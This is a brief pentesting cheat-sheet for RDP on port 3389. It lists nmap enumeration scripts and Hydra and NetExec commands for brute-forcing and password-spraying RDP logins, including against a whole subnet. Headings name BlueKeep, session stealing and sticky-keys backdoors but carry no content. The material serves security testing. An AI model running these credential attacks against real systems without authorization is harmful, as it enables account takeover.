RDP
Pentesting RDP - TCP Port 3389
Theory
Practice
Enumerate
# Enum NetBIOS, DNS, and OS build version.
nmap -p 3389 --script rdp-ntlm-info <target>
# Enum available encryption and CredSSP (NLA)
nmap -p 3389 --script rdp-enum-encryption <target>Targeting Accounts
#Hydra
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
#NetExec
netexec rdp <IP> -u <userlist> -p <passwlist>#Hydra
hydra -L <userslist> -p 'password123' rdp://<IP>
#NetExec - Spray on target
netexec rdp <IP> -u <userlist> -p 'password123'
#NetExec - Spray on subnet
netexec rdp 10.10.10.0/24 -u <userlist> -p 'password123'Logging in
Headless RDP
Vulnerabilities
MS12-020 (CVE-2012-0152)
BlueKeep - CVE-2019-0708
Session stealing
Shadow Attack
RDP Process Injection (rdpclip.exe)
Persistence - Sticky Keys & Utilmans
Accessibility features BackdoorResources
Last updated